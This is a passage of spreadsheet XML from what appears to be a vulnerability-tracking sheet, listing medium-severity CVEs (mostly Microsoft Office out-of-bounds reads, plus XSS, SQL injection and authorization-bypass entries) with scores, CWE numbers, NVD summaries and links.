s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1680" s="5" t="inlineStr" /><c r="H1680" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1680" s="5" t="inlineStr" /><c r="J1680" s="5" t="inlineStr" /><c r="K1680" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1680" s="5" t="inlineStr" /><c r="M1680" s="5" t="inlineStr" /><c r="N1680" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1680" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1680" s="5" t="inlineStr" /><c r="Q1680" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1680" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1680" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78515</t></is></c></row><row r="1681"><c r="A1681" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1681" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1681" s="5" t="inlineStr"><is><t>CVE-2026-78520</t></is></c><c r="D1681" s="5" t="n"><v>6.5</v></c><c r="E1681" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1681" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1681" s="5" t="inlineStr" /><c r="H1681" s="5" t="n"><v>0.007</v></c><c r="I1681" s="5" t="inlineStr" /><c r="J1681" s="5" t="inlineStr" /><c r="K1681" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1681" s="5" t="inlineStr" /><c r="M1681" s="5" t="inlineStr" /><c r="N1681" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1681" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1681" s="5" t="inlineStr" /><c r="Q1681" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1681" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S1681" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78520</t></is></c></row><row r="1682"><c r="A1682" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1682" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1682" s="5" t="inlineStr"><is><t>CVE-2026-78522</t></is></c><c r="D1682" s="5" t="n"><v>6.5</v></c><c r="E1682" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1682" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1682" s="5" t="inlineStr" /><c r="H1682" s="5" t="n"><v>0.007</v></c><c r="I1682" s="5" t="inlineStr" /><c r="J1682" s="5" t="inlineStr" /><c r="K1682" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1682" s="5" t="inlineStr" /><c r="M1682" s="5" t="inlineStr" /><c r="N1682" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1682" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1682" s="5" t="inlineStr" /><c r="Q1682" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1682" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1682" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78522</t></is></c></row><row r="1683"><c r="A1683" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1683" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1683" s="5" t="inlineStr"><is><t>CVE-2026-78701</t></is></c><c r="D1683" s="5" t="n"><v>6.5</v></c><c r="E1683" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1683" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G1683" s="5" t="inlineStr" /><c r="H1683" s="5" t="n"><v>0.004</v></c><c r="I1683" s="5" t="inlineStr" /><c r="J1683" s="5" t="inlineStr" /><c r="K1683" s="5" t="inlineStr" /><c r="L1683" s="5" t="inlineStr" /><c r="M1683" s="5" t="inlineStr" /><c r="N1683" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1683" s="5" t="inlineStr"><is><t>2026-08-25</t></is></c><c r="P1683" s="5" t="inlineStr" /><c r="Q1683" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="R1683" s="5" t="inlineStr"><is><t>A flaw was found in 389-ds-base. A remote, authenticated attacker could exploit a vulnerability in the Simple Authentication and Security Layer (SASL) UNBIND process. By sending a specially crafted request, the attacker can cause a connection to stall, leading to resource exhaustion and a Denial of Service (DoS) for the server.</t></is></c><c r="S1683" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78701</t></is></c></row><row r="1684"><c r="A1684" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1684" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1684" s="5" t="inlineStr"><is><t>CVE-2026-78838</t></is></c><c r="D1684" s="5" t="n"><v>6.5</v></c><c r="E1684" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1684" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1684" s="5" t="inlineStr" /><c r="H1684" s="5" t="n"><v>0.004</v></c><c r="I1684" s="5" t="inlineStr" /><c r="J1684" s="5" t="inlineStr" /><c r="K1684" s="5" t="inlineStr" /><c r="L1684" s="5" t="inlineStr" /><c r="M1684" s="5" t="inlineStr" /><c r="N1684" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1684" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1684" s="5" t="inlineStr" /><c r="Q1684" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1684" s="5" t="inlineStr"><is><t>A reflected cross-site scripting (XSS) vulnerability in the grid_datasource.php component of AppNitro MachForm v30 allows attackers to execute arbitrary Javascript in the context of the victim's browser via injecting a crafted payload into the filter[filters][0][field] parameter.</t></is></c><c r="S1684" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78838</t></is></c></row><row r="1685"><c r="A1685" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1685" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1685" s="5" t="inlineStr"><is><t>CVE-2026-78970</t></is></c><c r="D1685" s="5" t="n"><v>6.5</v></c><c r="E1685" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1685" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1685" s="5" t="inlineStr" /><c r="H1685" s="5" t="n"><v>0.003</v></c><c r="I1685" s="5" t="inlineStr" /><c r="J1685" s="5" t="inlineStr" /><c r="K1685" s="5" t="inlineStr" /><c r="L1685" s="5" t="inlineStr" /><c r="M1685" s="5" t="inlineStr" /><c r="N1685" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1685" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1685" s="5" t="inlineStr" /><c r="Q1685" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R1685" s="5" t="inlineStr"><is><t>JeecgBoot 3.9.2 and earlier contains an authorization bypass vulnerability in the SystemApiController component. An authenticated attacker with any valid JWT token can access multiple API endpoints (including queryAllUser, queryUsersByUsernames, queryUserById, and queryUsersByIds) to retrieve sensitive information of all users, including real names, phone numbers, email addresses, employee numbers, and role definitions, due to missing fine-grained permission checks and incomplete data desensitization.</t></is></c><c r="S1685" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78970</t></is></c></row><row r="1686"><c r="A1686" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1686" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1686" s="5" t="inlineStr"><is><t>CVE-2026-79379</t></is></c><c r="D1686" s="5" t="n"><v>6.5</v></c><c r="E1686" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1686" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1686" s="5" t="inlineStr" /><c r="H1686" s="5" t="n"><v>0.003</v></c><c r="I1686" s="5" t="inlineStr" /><c r="J1686" s="5" t="inlineStr" /><c r="K1686" s="5" t="inlineStr" /><c r="L1686" s="5" t="inlineStr" /><c r="M1686" s="5" t="inlineStr" /><c r="N1686" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1686" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1686" s="5" t="inlineStr" /><c r="Q1686" s="5" t="inlineStr"><is><t>CWE-617</t></is></c><c r="R1686" s="5" t="inlineStr"><is><t>A buffer overflow in the SBC_DecodeFrames() function of Bestechnic Co., Ltd BES2300 Bluetooth Audio SoC firmware v3.x and earlier and fixed in v.5.0 allows attackers to cause a Denial of Service (DoS) via sending a crafted frame.</t></is></c><c r="S1686" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79379</t></is></c></row><row r="1687"><c r="A1687" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1687" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1687" s="5" t="inlineStr"><is><t>CVE-2026-79573</t></is></c><c r="D1687" s="5" t="n"><v>6.5</v></c><c r="E1687" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1687" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1687" s="5" t="inlineStr" /><c r="H1687" s="5" t="n"><v>0.003</v></c><c r="I1687" s="5" t="inlineStr" /><c r="J1687" s="5" t="inlineStr" /><c r="K1687" s="5" t="inlineStr" /><c r="L1687" s="5" t="inlineStr" /><c r="M1687" s="5" t="inlineStr" /><c r="N1687" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1687" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1687" s="5" t="inlineStr" /><c r="Q1687" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="R1687" s="5" t="inlineStr"><is><t>L-ONE v1.0.0 was discovered to contain multiple SQL injection vulnerabilities in the /attachment/getBusinessUploadList component via the busid, id, and taskid parameters. This vulnerability allows attackers to access sensitive database information via a crafted SQL statement.</t></is></c><c r="S1687" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79573</t></is></c></row><row r="1688"><c r="A1688" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1688" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1688" s="5" t="inlineStr"><is><t>CVE-2026-80073</t></is></c><c r="D1688" s="5" t="n"><v>6.5</v></c><c r="E1688" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1688" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1688" s="5" t="inlineStr" /><c r="H1688" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1688" s="5" t="inlineStr" /><c r="J1688" s="5" t="inlineStr" /><c r="K1688" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:outlook</t></is></c><c r="L1688" s="5" t="inlineStr" /><c r="M1688" s="5" t="inlineStr" /><c r="N1688" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1688" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1688" s="5" t="inlineStr" /><c r="Q1688" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1688" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Outlook allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1688" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80073</t></is></c></row><row r="1689"><c r="A1689" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1689" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1689" s="5" t="inlineStr"><is><t>CVE-2026-80076</t></is></c><c r="D1689" s="5" t="n"><v>6.5</v></c><c r="E1689" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1689" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1689" s="5" t="inlineStr" /><c r="H1689" s="5" t="n"><v>0.007</v></c><c r="I1689" s="5" t="inlineStr" /><c r="J1689" s="5" t="inlineStr" /><c r="K1689" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1689" s="5" t="inlineStr" /><c r="M1689" s="5" t="inlineStr" /><c r="N1689" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1689" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1689" s="5" t="inlineStr" /><c r="Q1689" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1689" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1689" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80076</t></is></c></row><row r="1690"><c r="A1690" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1690" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1690" s="5" t="inlineStr"><is><t>CVE-2026-80078</t></is></c><c r="D1690" s="5" t="n"><v>6.5</v></c><c r="E1690" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1690" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1690" s="5" t="inlineStr" /><c r="H1690" s="5" t="n"><v>0.007</v></c><c r="I1690" s="5" t="inlineStr" /><c r="J1690" s="5" t="inlineStr" /><c r="K1690" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1690" s="5" t="inlineStr" /><c r="M1690" s="5" t="inlineStr" /><c r="N1690" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1690" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1690" s="5" t="inlineStr" /><c r="Q1690" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1690" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1690" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80078</t></is></c></row><row r="1691"><c r="A1691" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1691" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1691" s="5" t="inlineStr"><is><t>CVE-2026-80079</t></is></c><c r="D1691" s="5" t="n"><v>6.5</v></c><c r="E1691" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1691" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1691" s="5" t="inlineStr" /><c r="H1691" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1691" s="5" t="inlineStr" /><c r="J1691" s="5" t="inlineStr" /><c r="K1691" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1691" s="5" t="inlineStr" /><c r="M1691" s="5" t="inlineStr" /><c r="N1691" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1691" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1691" s="5" t="inlineStr" /><c r="Q1691" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1691" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1691" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80079</t></is></c></row><row r="1692"><c r="A1692" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1692" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1692" s="5" t="inlineStr"><is><t>CVE-2026-80082</t></is></c><c r="D1692" s="5" t="n"><v>6.5</v></c><c r="E1692" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1692" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1692" s="5" t="inlineStr" /><c r="H1692" s="5" t="n"><v>0.007</v></c><c r="I1692" s="5" t="inlineStr" /><c r="J1692" s="5" t="inlineStr" /><c r="K1692" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1692" s="5" t="inlineStr" /><c r="M1692" s="5" t="inlineStr" /><c r="N1692" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1692" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1692" s="5" t="inlineStr" /><c r="Q1692" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1692" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1692" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80082</t></is></c></row><row r="1693"><c r="A1693" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1693" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1693" s="5" t="inlineStr"><is><t>CVE-2026-80084</t></is></c><c r="D1693" s="5" t="n"><v>6.5</v></c><c r="E1693" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1693" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1693" s="5" t="inlineStr" /><c r="H1693" s="5" t="n"><v>0.007</v></c><c r="I1693" s="5" t="inlineStr" /><c r="J1693" s="5" t="inlineStr" /><c r="K1693" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1693" s="5" t="inlineStr" /><c r="M1693" s="5" t="inlineStr" /><c r="N1693" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1693" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1693" s="5" t="inlineStr" /><c r="Q1693" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1693" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Outlook allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1693" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80084</t></is></c></row><row r="1694"><c r="A1694" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1694" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1694" s="5" t="inlineStr"><is><t>CVE-2026-80086</t></is></c><c r="D1694" s="5" t="n"><v>6.5</v></c><c r="E1694" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1694" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1694" s="5" t="inlineStr" /><c r="H1694" s="5" t="n"><v>0.007</v></c><c r="I1694" s="5" t="inlineStr" /><c r="J1694" s="5" t="inlineStr" /><c r="K1694" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1694" s="5" t="inlineStr" /><c r="M1694" s="5" t="inlineStr" /><c r="N1694" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1694" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1694" s="5" t="inlineStr" /><c r="Q1694" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1694" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office PowerPoint allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1694" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80086</t></is></c></row><row r="1695"><c r="A1695" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1695" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1695" s="5" t="inlineStr"><is><t>CVE-2026-80087</t></is></c><c r="D1695" s="5" t="n"><v>6.5</v></c><c r="E1695" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1695" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1695" s="5" t="inlineStr" /><c r="H1695" s="5" t="n"><v>0.007</v></c><c r="I1695" s="5" t="inlineStr" /><c r="J1695" s="5" t="inlineStr" /><c r="K1695" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1695" s="5" t="inlineStr" /><c r="M1695" s="5" t="inlineStr" /><c r="N1695" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1695" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1695" s="5" t="inlineStr" /><c r="Q1695" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1695" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1695" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80087</t></is></c></row><row r="1696"><c r="A1696" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1696" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1696" s="5" t="inlineStr"><is><t>CVE-2026-80088</t></is></c><c r="D1696" s="5" t="n"><v>6.5</v></c><c r="E1696" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1696" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1696" s="5" t="inlineStr" /><c r="H1696" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1696" s="5" t="inlineStr" /><c r="J1696" s="5" t="inlineStr" /><c r="K1696" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1696" s="5" t="inlineStr" /><c r="M1696" s="5" t="inlineStr" /><c r="N1696" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1696" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1696" s="5" t="inlineStr" /><c r="Q1696" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1696" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1696" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80088</t></is></c></row><row r="1697"><c r="A1697" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1697" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1697" s="5" t="inlineStr"><is><t>CVE-2026-80089</t></is></c><c r="D1697" s="5" t="n"><v>6.5</v></c><c r="E1697" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1697" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1697" s="5" t="inlineStr" /><c r="H1697" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1697" s="5" t="inlineStr" /><c r="J1697" s="5" t="inlineStr" /><c r="K1697" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1697" s="5" t="inlineStr" /><c r="M1697" s="5" t="inlineStr" /><c r="N1697" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1697" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1697" s="5" t="inlineStr" /><c r="Q1697" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1697" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1697" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80089</t></is></c></row><row r="1698"><c r="A1698" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1698" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1698" s="5" t="inlineStr"><is><t>CVE-2026-80090</t></is></c><c r="D1698" s="5" t="n"><v>6.5</v></c><c r="E1698" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1698" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1698" s="5" t="inlineStr" /><c r="H1698" s="5" t="n"><v>0.007</v></c><c r="I1698" s="5" t="inlineStr" /><c r="J1698" s="5" t="inlineStr" /><c r="K1698" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1698" s="5" t="inlineStr" /><c r="M1698" s="5" t="inlineStr" /><c r="N1698" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1698" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1698" s="5" t="inlineStr" /><c r="Q1698" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1698" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1698" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80090</t></is></c></row><row r="1699"><c r="A1699" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1699" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1699" s="5" t="inlineStr"><is><t>CVE-2026-80091</t></is></c><c r="D1699" s="5" t="n"><v>6.5</v></c><c r="E1699" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1699" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1699" s="5" t="inlineStr" /><c r="H1699" s="5" t="n"><v>0.007</v></c><c r="I1699" s="5" t="inlineStr" /><c r="J1699" s="5" t="inlineStr" /><c r="K1699" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1699" s="5" t="inlineStr" /><c r="M1699" s="5" t="inlineStr" /><c r="N1699" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1699" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1699" s="5" t="inlineStr" /><c r="Q1699" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="R1699" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1699" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80091</t></is></c></row><row r="1700"><c r="A1700" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1700" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1700" s="5" t="inlineStr"><is><t>CVE-2026-81377</t></is></c><c r="D1700" s="5" t="n"><v>6.5</v></c><c r="E1700" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1700" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1700" s="5" t="inlineStr" /><c r="H1700" s="5" t="n"><v>0.008</v></c><c r="I1700" s="5" t="inlineStr" /><c r="J1700" s="5" t="inlineStr" /><c r="K1700" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L1700" s="5" t="inlineStr" /><c r="M1700" s="5" t="inlineStr" /><c r="N1700" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1700" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1700" s="5" t="inlineStr" /><c r="Q1700" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R1700" s="5" t="inlineStr"><is><t>Improper limitation of a pathname to a restricted directory ('path traversal') in Visual Studio Code allows an unauthorized attacker to perform tampering over a network.</t></is></c><c r="S1700" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81377</t></is></c></row><row r="1701"><c r="A1701" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1701" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1701" s="5" t="inlineStr"><is><t>CVE-2026-81666</t></is></c><c r="D1701" s="5" t="n"><v>6.5</v></c><c r="E1701" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1701" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G1701" s="5" t="inlineStr" /><c r="H1701" s="5" t="n"><v>0.003</v></c><c r="I1701" s="5" t="inlineStr" /><c r="J1701" s="5" t="inlineStr" /><c r="K1701" s="5" t="inlineStr" /><c 